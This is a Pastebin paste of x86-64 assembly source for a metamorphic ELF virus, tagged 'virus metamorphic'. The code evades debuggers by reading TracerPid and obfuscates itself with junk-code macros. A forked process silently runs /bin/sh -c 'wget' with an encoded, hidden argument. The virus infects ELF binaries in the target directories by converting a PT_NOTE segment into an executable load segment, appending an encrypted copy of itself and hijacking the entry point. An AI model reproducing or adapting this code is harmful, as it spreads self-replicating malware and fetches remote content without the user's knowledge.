API tools faq
paste
FlyFar

vx.s

FlyFar
Jun 29th, 2023
199
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
ASM (NASM) 16.60 KB | Cybersecurity | 0 0
raw download clone embed print report
  1. %include "./header.s"
  2.  
  3. SECTION .TEXT EXEC WRITE
  4. global  _start                              ;must be declared for linker (ld)
  5.  
  6. _start:   ;Entry-Point
  7. OBF_GENERIC
  8. PUSH
  9. OBF_GENERIC
  10.  
  11. mov rbp, rsp
  12. sub rbp, famine_size  ; reserve famine_size bytes on the stack
  13.  
  14.  
  15. OBF_POLY_1
  16.  
  17.  
  18. OBF_GENERIC
  19. .check_status:      ;open the /proc/self/status
  20. OBF_GENERIC
  21. xor rdi ,rdi
  22. lea rdi, STACK(famine.file_path)
  23.  
  24.  
  25. ;BUILD STRING /proc/self/status FOR OBF
  26. OBF_GENERIC
  27. mov rsi, 0x1E40AEC66F2F
  28. OBF_GENERIC1
  29. mov rax, 0x1122C0AC0100
  30. add rsi, rax
  31. mov qword[rdi], rsi
  32. add rdi, 6
  33. mov rsi, 0x500A87BF3341
  34. OBF_GENERIC1
  35. mov rax, 0x2324DEAD3232
  36. add rsi, rax
  37. mov qword[rdi], rsi
  38. add rdi, 6
  39. mov rsi, 0x72729481A8
  40. OBF_GENERIC
  41. mov rax, 0x0102DFDFCC
  42. add rsi, rax
  43. mov qword[rdi], rsi
  44. sub rdi, 12
  45.  
  46. OBF_GENERIC
  47.  
  48.  
  49. mov rsi, O_RDONLY
  50. OBF_GENERIC
  51. mov rax, _open
  52. syscall
  53. cmp rax, 0
  54. OBF_GENERIC
  55. jl _exx
  56.  
  57. OBF_GENERIC2
  58. lea rsi, STACK(famine.status_str)  ; buf address for read /proc/self/status
  59. mov rdi, rax   ; fd from previous read
  60. mov rdx, 110
  61. mov rax, _read
  62. OBF_GENERIC
  63. syscall
  64. cmp rax, 0
  65. jb _exx_pop
  66.  
  67. lea r12, STACK(famine.status_str)
  68. mov r11, 7
  69. OBF_GENERIC
  70. .loop_status:
  71. OBF_GENERIC2
  72. inc r12
  73. cmp byte[r12], 0x0a
  74. jne .nope
  75. OBF_GENERIC
  76. dec r11
  77. cmp r11, 0
  78. je .check_trcr
  79. .nope:
  80. OBF_GENERIC1
  81. loop .loop_status
  82.  
  83. .check_trcr:
  84. add r12, 12
  85. OBF_GENERIC2
  86. cmp byte[r12], 0x30     ;   CMP TRACERPID VAL WITH 0
  87. jne _exx_pop
  88.  
  89.  
  90.  
  91. .opendir_proc:
  92.     OBF_GENERIC
  93.     lea rdi, STACK(famine.commpath)
  94.     mov rsi, 0x13203C936162
  95.     OBF_GENERIC2
  96.     lea rdi, STACK(famine.commpath)
  97.     mov rax, 0x1C4332DF0ECD
  98.     add rsi, rax
  99.     mov qword[rdi], rsi
  100.     mov rsi, O_RDONLY | O_DIRECTORY
  101.     mov rax, _open
  102.     syscall
  103.     OBF_GENERIC1
  104.     test eax, eax
  105.     jl _exx_pop
  106.     mov r14, rax
  107.  
  108. .readdir_proc:
  109.     OBF_GENERIC
  110.     mov rdx, DIRENT_ARR_SIZE
  111.     lea rsi, STACK(famine.dirents_proc)
  112.     mov rdi, r14
  113.     mov rax, _getdents
  114.     syscall
  115.     test rax, rax
  116.     OBF_GENERIC
  117.     jle .closedir_proc
  118.     OBF_GENERIC2
  119.     mov r13, 0
  120.     mov r12, rax
  121.     call .read_file
  122.     jmp .readdir_proc
  123.  
  124. .closedir_proc:
  125.     mov rdi, r14
  126.     OBF_GENERIC2
  127.     mov rax, _close
  128.     syscall
  129.     jmp .OUI
  130.  
  131.  
  132. .read_file:
  133.     lea rdi, STACK(famine.dirents_proc)
  134.     add rdi, r13
  135.     OBF_GENERIC2
  136.     movzx edx, word[rdi+dirent.d_reclen]
  137.     mov al, byte[rdi + rdx - 1]
  138.     add rdi, dirent.d_name
  139.     OBF_GENERIC2
  140.     add r13, rdx
  141.     cmp al, DT_DIR
  142.     jne .nextfile_proc
  143.  
  144.  
  145.  
  146. ;compute commfile path
  147. xor r10, r10
  148.  
  149. .dirname_proc:
  150.     lea rsi, STACK(famine.commpath)
  151.     mov rax, 0x13203C936162
  152.     OBF_GENERIC2
  153.     mov r11, 0x1C4332DF0ECD
  154.     add rax, r11
  155.     mov qword[rsi], rax
  156.     add r10, 6
  157.     jb .dirname_proc
  158.  
  159. .filename_proc:
  160.     mov al, byte[rdi]
  161.     mov byte[rsi + r10], al
  162.     inc r10
  163.     OBF_GENERIC2
  164.     inc rdi
  165.     cmp byte[rdi], 0
  166.     jne .filename_proc
  167.  
  168.  
  169. .commfile:
  170.     mov rax, 0x5CAEC3C0FF
  171.     OBF_GENERIC
  172.     mov r11, 0x10BEABA230
  173.     add rax, r11
  174.     mov qword[rsi + r10], rax
  175.     add r10, 6
  176.     OBF_GENERIC2
  177.     mov byte[rsi + r10], 0
  178.  
  179. ;open the commfile
  180.     xor rsi, rsi
  181.     mov rax, _open
  182.     lea rdi, STACK(famine.commpath)
  183.     OBF_GENERIC1
  184.     mov rdx, O_RDWR
  185.     syscall
  186.     test eax, eax
  187.     jl .nextfile_proc
  188.  
  189. ;read the commfile
  190.     OBF_PUSH_RAX
  191.     mov rdi, rax
  192.     mov rax, _read
  193.     OBF_GENERIC2
  194.     lea rsi, STACK(famine.commpath)
  195.     mov rdx, 90
  196.     syscall
  197.     OBF_POP_R9
  198.     test eax, eax
  199.     jl .close_proc
  200.     mov byte[rsi + rax - 1], 0x0
  201.     lea rdi, [rel forbidden]
  202.     call .strcmp
  203.     cmp rax, 0
  204.     je .done
  205.     .close_proc:
  206.     OBF_GENERIC2
  207.     mov rdi, r9
  208.     mov rax, _close
  209.     syscall
  210.     jmp .nextfile_proc
  211.  
  212.  
  213. .strcmp:
  214.     mov r10b, BYTE [rdi]
  215.     OBF_GENERIC2
  216.     mov r11b, BYTE [rsi]
  217.     cmp r10b, 0
  218.     je .end_cmp
  219.     cmp r11b, 0
  220.     je .end_cmp
  221.     cmp r10b, r11b
  222.     jne .end_cmp
  223.     inc rdi
  224.     OBF_GENERIC1
  225.     inc rsi
  226.     jmp .strcmp
  227.  
  228. .end_cmp:
  229.     movzx rax, r10b
  230.     movzx rbx, r11b
  231.     OBF_GENERIC
  232.     sub rax, rbx
  233.     ret
  234.  
  235. .done:
  236.     OBF_POP_RDI     ; this pop is required in case of Exit from strcmp cause we did a CALL in readdir_proc  and must pop its address
  237.     jmp _exx_pop
  238.  
  239. .nextfile_proc:
  240.     cmp r13, r12
  241.     jl .read_file
  242.     ret
  243.  
  244.  
  245. .get_random:
  246.     OBF_PUSH_RDI
  247.     push rsi
  248.     OBF_PUSH_RAX
  249.     push rdx
  250.  
  251.     OBF_GENERIC2
  252.     lea rdi, [rel random]
  253.     mov rsi, O_RDONLY
  254.     mov rax, _open
  255.     OBF_GENERIC
  256.     syscall                 ; OPEN /dev/urandom  EXIT if not work
  257.     cmp rax, 0
  258.     jl  .err_ex
  259.  
  260.     mov rdi, rax        ; fd to read
  261.     OBF_GENERIC2
  262.     mov rax, _read
  263.     mov rdx, 4
  264.     lea rsi, STACK(famine.tmp_rand)
  265.     OBF_GENERIC
  266.     syscall             ; READ 8 RANDOM BYTE<3
  267.    
  268.     mov rax, _close
  269.     syscall
  270.  
  271.     OBF_GENERIC
  272.     pop rdx
  273.     OBF_POP_RAX
  274.     pop rsi
  275.     OBF_POP_RDI
  276.     ret
  277.     .err_ex:
  278.     pop rdx
  279.     OBF_POP_RAX
  280.     pop rsi
  281.     OBF_POP_RDI
  282.     OBF_POP_RDI
  283.     OBF_POP_RDI
  284.     jmp _exx_pop
  285.  
  286. .OUI:
  287. jmp .enc_start
  288.     OBF_GENERIC
  289. DECYPHER
  290.     OBF_GENERIC
  291.  
  292.  
  293.  
  294. .enc_start:
  295.  
  296. ;DUREX BLOCK HERE  BETWEEN .DUREX AND .SKIP_DUREX
  297. .durex:
  298. ;FORK THE DUREX PROCESS !
  299.     OBF_GENERIC
  300.     mov rax, _fork
  301.     OBF_GENERIC
  302.     syscall
  303.     cmp rax, 0
  304.     jne .skip_durex
  305.  
  306.  
  307. ;   CLOSE FD 1 AND 2 FOR FORKED  DUREX PROCESS
  308.     OBF_GENERIC
  309.     mov rax, _close
  310.     mov rdi, 1
  311.     syscall
  312.     mov rax, _close
  313.     OBF_GENERIC
  314.     mov rdi, 2
  315.     syscall
  316.  
  317.     lea rdi, STACK(famine.status_str)
  318.     OBF_GENERIC
  319.     lea rsi, STACK(famine.commpath)
  320.     mov rax, 0x69622f
  321.     mov qword[rdi], rax
  322.     OBF_GENERIC
  323.     add rdi, 3
  324.     mov rax, 0x687361622f6e
  325.     mov qword[rdi], rax
  326.     OBF_GENERIC
  327.     sub rdi, 3
  328.     mov qword[rsi], rdi
  329.  
  330.     mov dword STACK(famine.new_dir), 0x0000632d
  331.     OBF_GENERIC
  332.     lea rax, STACK(famine.new_dir)
  333.  
  334.     mov qword[rsi+8], rax
  335.     add rax, 4
  336.  
  337.     mov byte[rax], 0x27
  338.     inc rax
  339.     mov r10, 0x74656777
  340.     OBF_GENERIC
  341.     mov qword[rax], r10
  342.     mov qword[rsi+16], rax
  343.     OBF_GENERIC
  344.     add rax, 4
  345.     mov r10b, 0x20
  346.     mov byte[rax], r10b
  347.     OBF_GENERIC
  348.     inc rax
  349.  
  350.     mov r10, 0x1FE9D6214E305123
  351.     OBF_GENERIC
  352.     mov r11, 0xF45645222442345
  353.     add r10, r11
  354.     mov qword[rax], r10
  355.     mov r10, 0x627F71E4CF734788
  356.     mov r11, 0xAEF090990121DF
  357.     add r10, r11
  358.     mov qword[rax+8], r10
  359.     mov r10, 0x1338087384BA29D6
  360.     OBF_GENERIC
  361.     mov r11, 0x623758FEDC754399
  362.     add r10, r11
  363.     mov qword[rax+16], r10
  364.     mov r10, 0x657480C882200252
  365.     mov r11, 0xFEFE4A9AD123222
  366.     add r10, r11
  367.     mov qword[rax+24], r10
  368.     mov r10, 0x58F9FA9117B35E00
  369.     mov r11, 0x143567DE54AED178
  370.     add r10, r11
  371.     mov qword[rax+32], r10
  372.     mov r10, 0x651A41E5BDEFB23E
  373.     mov r11, 0x1029ED8CA784C123
  374.     OBF_GENERIC
  375.     add r10, r11
  376.     mov qword[rax+40], r10
  377.     OBF_GENERIC
  378.     mov r10, 0x1BAAB6F9EB6664A5
  379.     mov r11, 0x21CCAA78541200CD
  380.     add r10, r11
  381.     mov qword[rax+48], r10
  382.     mov r10, 0x24167B8C5FA63D78
  383.     mov r11, 0x0909E9E912CDFFFF
  384.     add r10, r11
  385.     mov qword[rax+54], r10
  386.     mov r10, 0x5F5C631E0F3E
  387.     mov r11, 0x742F111111111111
  388.     add r10, r11
  389.     OBF_GENERIC
  390.     mov qword[rax+62], r10
  391.     mov r10, 0x20527BA8C39CA60E
  392.     mov r11, 0x5412EDCCAD908712
  393.     add r10, r11
  394.     mov qword[rax+70], r10
  395.     mov r10, 0x425B84450C07D917
  396.     mov r11, 0x3409DFEA14675409
  397.     add r10, r11
  398.     mov qword[rax+78], r10
  399.     mov r10, 0xEBAA7DC5A415D1E
  400.     mov r11, 0x1165789012341111
  401.     add r10, r11
  402.     OBF_GENERIC
  403.     mov qword[rax+86], r10
  404.     mov r10, 0x1A0A262C437B24DB
  405.     mov r11, 0x55634236DCAB0145
  406.     add r10, r11
  407.     mov qword[rax+94], r10
  408.     mov r10, 0x73FCDA4A89A6B921
  409.     mov r11, 0x3245ECAD906743
  410.     add r10, r11
  411.     mov qword[rax+102], r10,
  412.     mov r10, 0xEE0591FED833C10
  413.     OBF_GENERIC
  414.     mov r11, 0x1145CD0086AC345D
  415.     add r10, r11
  416.     mov qword[rax+110], r10
  417.     mov r10, 0x1CB03BEFFFD03BF
  418.     mov r11, 0x7070707070707070
  419.     add r10, r11
  420.     mov qword[rax+118], r10
  421.     mov r10, 0x55522D191E1C52C0
  422.     OBF_GENERIC
  423.     mov r11, 0x1EDD43545612CDAD
  424.     add r10, r11
  425.     mov qword[rax+126], r10
  426.     mov qword[rsi+24], 0x0
  427.     OBF_GENERIC
  428.     mov rdx, 0
  429.     mov rax, 59
  430.     syscall
  431.     .skip_durex:
  432.  
  433.     OBF_GENERIC1
  434.     mov rax, _fork
  435.     syscall
  436.     OBF_GENERIC
  437.     cmp rax, 0
  438.     jne _exx_pop
  439.  
  440. lea rdi, [rel infect_dir] ; load dir str
  441. .opendir:
  442.     mov r14, rdi
  443.     OBF_GENERIC1
  444.     OBF_GENERIC
  445.     mov rsi, O_RDONLY | O_DIRECTORY
  446.     mov rax, _open
  447.     syscall             ;   open directory
  448.     test eax, eax
  449.     jl .nextdir
  450.     mov STACK(famine.dir_fd), rax       ; save dir_fd
  451.  
  452. .readdir:
  453.     mov rdx, DIRENT_ARR_SIZE
  454.     lea rsi, STACK(famine.dirents)
  455.     mov rdi, STACK(famine.dir_fd)
  456.     mov rax, _getdents
  457.     syscall             ;   get directory entries
  458.     test  rax,rax
  459.     jle .closedir       ;   no more entries
  460.     mov r13, 0
  461.     mov r12, rax
  462.  
  463. .file:
  464.     ; check directory entry for a regular file
  465.     lea rdi, STACK(famine.dirents)
  466.     add rdi, r13
  467.     movzx edx, word[rdi + dirent.d_reclen]
  468.     mov al, byte[rdi + rdx - 1]
  469.     add rdi, dirent.d_name
  470.     OBF_GENERIC1
  471.     add r13, rdx
  472.     cmp al, DT_REG
  473.     jne .nextfile
  474.     call process        ; process the file
  475.  
  476. .nextfile:
  477.     cmp r13, r12        ; check if directory entry looping is over
  478.     jl .file
  479.     jmp .readdir        ; read dir for more entry
  480.  
  481. .closedir:
  482.     mov rdi, STACK(famine.dir_fd)
  483.     mov rax, _close
  484.     syscall
  485.  
  486. .nextdir:
  487.     mov ecx, 0
  488.     mul ecx
  489.     dec ecx
  490.     mov rdi, r14
  491.     repnz scasb     ; next infect_dir
  492.     cmp byte[rdi], 0
  493.     jnz .opendir
  494.     POP     ; restore register
  495.     jmp _exx.exit       ;jump to the end
  496.  
  497. process:
  498.     mov rsi, r14  ; r14 hold infect dir
  499.     mov rax, rdi
  500.     lea rdi, STACK(famine.file_path)  ; load stack addr to store file_path
  501.     mov rdx, rdi
  502.  
  503. .dirname:
  504.     movsb           ; load dirname to rdi
  505.     cmp byte [rsi], 0
  506.     jnz .dirname
  507.     mov rsi, rax
  508.  
  509.     OBF_GENERIC
  510. .filename:
  511.     movsb           ; append filename to dirname to get full path
  512.     cmp byte[rsi - 1], 0
  513.     jnz .filename
  514.     mov rdi, rdx
  515.                 ;open file
  516.     mov rsi, O_RDWR
  517.     mov rax, _open
  518.     syscall         ; open
  519.  
  520.  
  521.     test eax, eax
  522.     jl .return
  523.     mov STACK(famine.file_fd), rax      ; save result from open to stack
  524.     OBF_GENERIC1
  525.  
  526.                 ;stat
  527.     lea rsi, STACK(famine.stat)
  528.     mov rdi, rax
  529.     mov rax, _fstat
  530.     syscall
  531.     cmp rax, 0
  532.     jnz .close
  533.     mov rsi, qword STACK(famine.stat + stat.st_size)    ; file size from stat to rsi
  534.     mov STACK(famine.file_size), rsi    ; save file size to stack
  535.     cmp rsi, elf64_ehdr_size + elf64_phdr_size + FAMINE_SIZE  ; check if size < ehdr_size + phdr size + famine_size
  536.     jl .close
  537.                 ;MMAP file
  538.     mov r9, 0
  539.     mov r8, STACK(famine.file_fd)  ; restore file_fd
  540.     mov r10, MAP_SHARED
  541.     mov rdx, PROT_READ | PROT_WRITE
  542.     xor rdi, rdi
  543.     mov rax, _mmap
  544.     syscall
  545.  
  546.     cmp rax, MMAP_ERRORS
  547.     jae .close
  548.    
  549.     mov STACK(famine.file_data), rax    ; save mmap to file from rax to stack
  550.     mov rdi, rax                        ;
  551.     call check_elf64
  552.     test al,al
  553.     jz .unmap
  554.     call inject_self
  555.  
  556. .unmap:
  557.     mov rsi, STACK(famine.file_size)
  558.     mov rdi, STACK(famine.file_data)
  559.     OBF_GENERIC1
  560.     mov rax, _munmap
  561.     syscall
  562.  
  563. .close:
  564.     mov rdi, STACK(famine.file_fd)
  565.     mov rax, _close
  566.     syscall
  567.  
  568. .return:
  569.     ret
  570.  
  571. check_elf64:
  572.     xor rax, rax
  573.     cmp qword[rdi+8], rax
  574.     jnz .return
  575.     mov rdx, _SYSV_         ;elf SYSV
  576.     cmp qword [rdi], rdx
  577.     jz .continue
  578.     mov rdx, _GNU_          ;ELF_GNU
  579.     cmp qword[rdi], rdx
  580.     jnz .return
  581.  
  582. .continue:
  583.     mov rdx, _DYN_
  584.     cmp qword[rdi + 16], rdx  ; DYN
  585.     jz .ok
  586.     mov rdx, _EXEC_
  587.     cmp qword[rdi + 16], rdx    ; EXEC
  588.     jnz .return
  589. .ok:
  590.     inc rax
  591. .return:
  592.     ret
  593.  
  594. inject_self:
  595.     push r13        ; save registers in case we need to restore
  596.     OBF_OVERWRITE_PUSHR14R15
  597.  
  598.     OBF_GENERIC2
  599.     jmp .after_poly_crap_skipped
  600.     POLY_CRAP_SKIPPED
  601.     .after_poly_crap_skipped:
  602.  
  603.  
  604.     mov r15, rdi ; save phdr[0] offset to r15
  605.     mov rdx, qword [rdi + elf64_ehdr.e_entry]
  606.     movzx rcx, word [rdi + elf64_ehdr.e_phnum]
  607.     mov rax, qword[rdi + elf64_ehdr.e_phoff]
  608.     add rdi,rax
  609.     mov r14, rdi  ; save phdr[0] offset to r14
  610.  
  611.     .segment:
  612.     cmp rcx, 0
  613.     jl .return
  614.     mov ax, SEGMENT_TYPE
  615.     mov r11w, word [rdi]
  616.     cmp ax, r11w
  617.     jnz .next
  618.     jmp .infect
  619.  
  620.     .next:
  621.     add rdi, elf64_phdr_size  ; add phdr size to rdi to loop through pheaders
  622.     dec rcx                   ; decrement phnum
  623.     jmp .segment
  624.  
  625.     .infect:
  626.     OBF_PUSH_RDI ; save phdr to infect offset to  stack
  627.  
  628. .get_rand_key:
  629.     OBF_GENERIC1
  630.     lea rdi, [rel random]
  631.     mov rsi, O_RDONLY
  632.     mov rax, _open
  633.     OBF_GENERIC
  634.     syscall                 ; OPEN /dev/urandom  EXIT if not work
  635.     cmp rax, 0
  636.     jl  _exx_pop
  637.  
  638.     OBF_PUSH_RAX
  639.     mov rdi, rax        ; fd to read
  640.     mov rax, _read
  641.     mov rdx, 2
  642.     lea rsi, STACK(famine.key)
  643.     syscall             ; READ 2 byte, 1 for key, 1 for derivate
  644.    
  645.     OBF_POP_RAX
  646.     mov rdi, rax        ; fd to read
  647.     mov rax, _read
  648.     mov rdx, 1
  649.     lea rsi, STACK(famine.factor)
  650.     OBF_GENERIC2
  651.     syscall             ; READ 2 byte, 1 for key, 1 for derivate
  652.     mov rax, _close
  653.     OBF_GENERIC1
  654.     syscall
  655.  
  656. OBF_GENERIC1
  657. ; get target End of file
  658.     mov rdi, STACK(famine.file_fd) ; target fd to rdi
  659.     mov rsi, 0 ; offset 0
  660.     mov rdx, END_SEEK
  661.     mov rax, _lseek
  662. OBF_GENERIC1
  663.     syscall
  664.     OBF_PUSH_RAX; save eof from lseek to stack
  665.  
  666. ;Here we check a presence of signature in case of a double PT_NOTE crap
  667.     mov r13, STACK(famine.file_data)
  668.     add r13, rax
  669.     sub r13, BEGIN_SIGNATURE_OFFSET_FORM_END
  670.     cmp byte[r13], 'P'
  671.     je .return_pop
  672.  
  673.     ; get delta  ( address at execution time)
  674.     call .delta
  675.     .delta:
  676.     pop r13
  677.     sub r13, .delta
  678.    
  679.     ; load cypher and write v
  680.     lea rsi, [r13 + _start] ; load _start addr to rsi
  681.     mov rdx, _end - _start  ; virus size to rdx
  682.     lea r10, STACK(famine.tocypher)  ; r10 hold future v-location in stack
  683.     .loading_v:
  684.         mov r11b, byte[rsi]
  685.         mov [r10], r11b
  686.     OBF_GENERIC1
  687.         inc rsi
  688.         inc r10
  689.         dec rdx
  690.     OBF_GENERIC
  691.         cmp rdx, 0
  692.         jg .loading_v
  693.  
  694.  
  695.     lea r10, STACK(famine.tocypher)
  696.     add r10,JUMP_DECYPHER_OFFSET
  697.     mov byte[r10], 0
  698.    
  699.     lea r10, STACK(famine.tocypher)
  700.     add r10, KEY_OFFSET
  701.     mov r11b, STACK(famine.key)
  702.     OBF_GENERIC1
  703.     mov byte[r10], r11b
  704.  
  705.     lea r10, STACK(famine.tocypher)
  706.     add r10, FACTOR_OFFSET
  707.     mov r11b, STACK(famine.factor)
  708.     mov byte[r10], r11b
  709.  
  710.     push r12
  711.     xor r12, r12
  712.    
  713.     lea r10, STACK(famine.tocypher)
  714.     add r10, SIGNATURE_OFFSET
  715.     mov r11b, STACK(famine.morph_sign_u)
  716.     mov r12b, STACK(famine.morph_sign_d)
  717.     cmp r11b, 7
  718.     jl .fp
  719.     inc r12b
  720.     mov r11, 0
  721.     .fp:
  722.     inc r11b
  723.     OBF_GENERIC2
  724.     add byte[r10], r12b
  725.     inc r10
  726.     add byte[r10], r11b
  727.     inc r10
  728.     add byte[r10], r12b
  729.     OBF_GENERIC1
  730.     inc r10
  731.     add byte[r10], r11b
  732.     inc r10
  733.     add byte[r10], r12b
  734.     inc r10
  735.     add byte[r10], r11b
  736.     inc r10
  737.     OBF_GENERIC
  738.     add byte[r10], r12b
  739.     inc r10
  740.     add byte[r10], r11b
  741.     .done_finger:
  742.     mov STACK(famine.morph_sign_u), r11
  743.     mov STACK(famine.morph_sign_d), r12
  744.     OBF_GENERIC2
  745.     call _start.get_random
  746.     lea r10,STACK(famine.tocypher)
  747.     add r10, POLY_OFFSET_1
  748.     mov r12, STACK(famine.tmp_rand)
  749.     mov dword[r10], r12d
  750.  
  751.     OBF_GENERIC1
  752.     call _start.get_random
  753.     lea r10, STACK(famine.tocypher)
  754.     add r10, POLY_CRAP_SKIPPED_OFFSET
  755.     mov rsi, 7
  756.  
  757.     .patch_poly_crap:
  758.     call _start.get_random
  759.     mov r12, STACK(famine.tmp_rand)
  760.     mov dword[r10], r12d
  761.     add r10, 4
  762.     dec rsi
  763.     cmp rsi, 0
  764.     jne .patch_poly_crap
  765.  
  766. CYPHER
  767.     pop r12
  768.  
  769.     mov rdi, STACK(famine.file_fd) ; fd to rdi
  770.     lea rsi, STACK(famine.tocypher)
  771.     mov rdx, _end - _start  ; virus size to rdx
  772.     OBF_POP_R10 ; rax hold eof from lseek syscall
  773.     OBF_PUSH_R10
  774.     mov rax, _pwrite
  775.     syscall
  776.     cmp rax, 0
  777.     jbe .return
  778.  
  779.     .edit_phdr:
  780.     OBF_POP_RAX             ;RDI = the offset of patched PHEADER
  781.     OBF_GENERIC
  782.     OBF_POP_RDI
  783.     OBF_PUSH_RDI
  784.     OBF_PUSH_RAX
  785.     mov dword [rdi], 1
  786.     mov eax, PF_R   ; READ
  787.     or eax, PF_X    ; EXEC
  788.     or eax, PF_W    ; WRITE
  789.     mov dword [rdi + 4], eax   ;SET PERMS !
  790.     OBF_POP_RAX             ; RAX = The offset of our injected V , (old EOF)
  791.     mov [rdi + 8], rax  ; set phdr.offset  = rax
  792.     mov r13, qword STACK(famine.stat + stat.st_size) ; load target size to r13
  793.     OBF_GENERIC1
  794.     add r13, 0xc000000 ; add vsize to r13
  795.     mov [rdi + 16], r13 ; edit  p_vaddr
  796.     mov [rdi + 24], r14 ; change paddr to new size
  797.     mov qword [rdi + 48], 0x200000  ; set align to 2mb
  798.     add qword [rdi + 32], _end - _start + 5
  799.     add qword [rdi + 40], _end - _start + 5
  800.  
  801.     .edit_ehdr:
  802.     mov rdi, STACK(famine.file_data)
  803.     mov r14, [rdi + elf64_ehdr.e_entry ] ; save original e_entry to r14
  804.     mov [rdi + elf64_ehdr.e_entry], r13 ; set ehdr.e_entry to vaddr of injected
  805.    
  806.     ;write it
  807.     mov rdi, STACK(famine.file_fd)
  808.     mov rsi, r15
  809.     mov rdx, EHDR_SIZE              ; 64 is size of EHDR
  810.     mov r10, 0
  811.     OBF_GENERIC
  812.     mov rax, _pwrite
  813.     syscall
  814.  
  815.     .jmp_wuw:
  816.     mov rdi , STACK(famine.file_fd)
  817.     OBF_GENERIC
  818.     mov rsi, 0
  819.     mov rdx, END_SEEK
  820.     OBF_GENERIC
  821.     mov rax, _lseek
  822.     OBF_GENERIC
  823.     syscall                     ; seek to file_end
  824.    
  825. ;   compute jump value
  826.     OBF_POP_RDI ;   restore patched pheader
  827.     mov rdx, [rdi + elf64_phdr.p_vaddr]
  828.     sub rdx, RETURN_JUMP_VALUE_OFFSET
  829.     sub r14, rdx
  830.     sub r14, _end - _start
  831.     OBF_GENERIC1
  832.     mov byte STACK(famine.jmp), JMP; jmp opcode
  833.     mov dword STACK(famine.jmp + 1), r14d
  834.  
  835. ;write it
  836.     mov rdi, STACK(famine.file_fd)
  837.     lea rsi, STACK(famine.jmp)
  838.     mov rdx, 5
  839.     OBF_GENERIC
  840.     sub rax, RETURN_JUMP_OFFSET  ; offset between _end:  and jump .exit
  841.     mov r10, rax ; EOF From last call to lseek
  842.     mov rax, _pwrite
  843.     OBF_GENERIC1
  844.     syscall
  845.  
  846.     mov rax, _sync
  847.     syscall
  848.    
  849.     jmp .return
  850.     .return_pop:
  851.     OBF_POP_RAX
  852.     OBF_POP_RDI
  853.     .return :
  854.         pop r15     ; restore saved registers
  855.     OBF_GENERIC1
  856.         pop r14
  857.         pop r13
  858.         ret
  859.  
  860.  
  861. infect_dir      db          "/tmp/test/",0,"/tmp/test2/",0,0
  862. enc_end:
  863.     db 0
  864. signature       db          0x00, 'Primary   version 99.0 (c)oded by <yarilo>42424242', 0xa, 0x00
  865. forbidden       db          "test.out", 0
  866. famine_entry    dq          _start
  867. random          db          "/dev/urandom",0,0
  868.  
  869. _exx_pop:
  870. POP
  871. _exx:
  872. jmp .exit   ; at source execution of famine this will exit. when written to target jump is edited to host entry
  873.         db 00, 00, 00, 00, 00
  874.     .exit:
  875.         mov rax, _exit
  876.         mov rdi, 0
  877.         syscall
  878. _end:
Tags: virus metamorphic
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!